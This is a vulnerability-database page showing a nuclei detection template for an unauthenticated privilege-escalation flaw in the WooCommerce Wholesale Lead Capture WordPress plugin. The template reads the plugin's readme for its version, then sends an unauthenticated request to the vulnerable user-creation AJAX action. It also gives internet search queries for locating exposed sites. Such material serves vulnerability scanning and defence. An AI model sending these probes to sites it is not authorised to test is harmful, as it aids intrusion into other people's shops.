Lucene search
+L

WooCommerce Wholesale Lead Capture <= 2.0.3.1 - Unauthenticated Privilege Escalation

🗓️ 15 Aug 2026 02:21:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated privilege escalation in WooCommerce Wholesale Lead Capture <= 2.0.3.1 via broken access control.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
CVE-2026-27542-CVE-2026-27540-
18 Apr 202608:51
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-27540
11 Mar 202605:23
githubexploit
attackerkb
ATTACKERKB
CVE-2026-27540
19 Mar 202605:24
attackerkb
attackerkb
ATTACKERKB
CVE-2026-27542
19 Mar 202605:22
attackerkb
circl
Circl
CVE-2026-27540
27 Feb 202621:03
circl
circl
Circl
CVE-2026-27542
27 Feb 202621:03
circl
cnnvd
CNNVD
WordPress plugin Woocommerce Wholesale Lead Capture 安全漏洞
19 Mar 202600:00
cnnvd
cnnvd
CNNVD
WordPress plugin Woocommerce Wholesale Lead Capture 代码问题漏洞
19 Mar 202600:00
cnnvd
cve
CVE
CVE-2026-27540
19 Mar 202605:24
cve
cve
CVE
CVE-2026-27542
19 Mar 202605:22
cve
Rows per page
id: CVE-2026-27542

info:
  name: WooCommerce Wholesale Lead Capture <= 2.0.3.1 - Unauthenticated Privilege Escalation
  author: theamanrawat,pdresearch
  severity: critical
  description: |
    Rymera Web Co Pty Ltd. Woocommerce Wholesale Lead Capture <= 2.0.3.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
  impact: |
    Attackers can escalate their privileges, potentially gaining unauthorized access to restricted functions or data.
  remediation: |
    Update to the latest version beyond 2.0.3.1.
  reference:
    - https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540-
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-wholesale-lead-capture
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27542
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-27542
    epss-score: 0.0054
    epss-percentile: 0.42745
    cwe-id: CWE-266
  metadata:
    verified: true
    max-request: 2
    vendor: rymera-web-co
    product: woocommerce-wholesale-lead-capture
    framework: wordpress
    fofa-query: body="/wp-content/plugins/woocommerce-wholesale-lead-capture/"
    shodan-query: http.html:"/wp-content/plugins/woocommerce-wholesale-lead-capture/"
    publicwww-query: "/wp-content/plugins/woocommerce-wholesale-lead-capture/"
  tags: cve,cve2026,wp,wordpress,woocommerce,wholesale,privesc,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/woocommerce-wholesale-lead-capture/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WooCommerce Wholesale Lead Capture")'
          - 'compare_versions(version, "<= 2.0.3.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s+([0-9]+\.[0-9]+(?:\.[0-9]+(?:\.[0-9]+)*)?)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        action=wwlc_create_user

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - '!regex("^(-1|0)\\s*$", body) && len(body) > 2'
          - 'contains_all(body, "wwlc_firstname", "wwlc_email")'
        condition: and
# digest: 4a0a0047304502205935583c67e946336cf674aa5bc27dfc15afe1a5ecbb27ae6c137cc2416f27250221008261d33a6d4e2ed4ccdf5145f0cad1681ee92cb88c9e92f757df5d678ccc1776:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation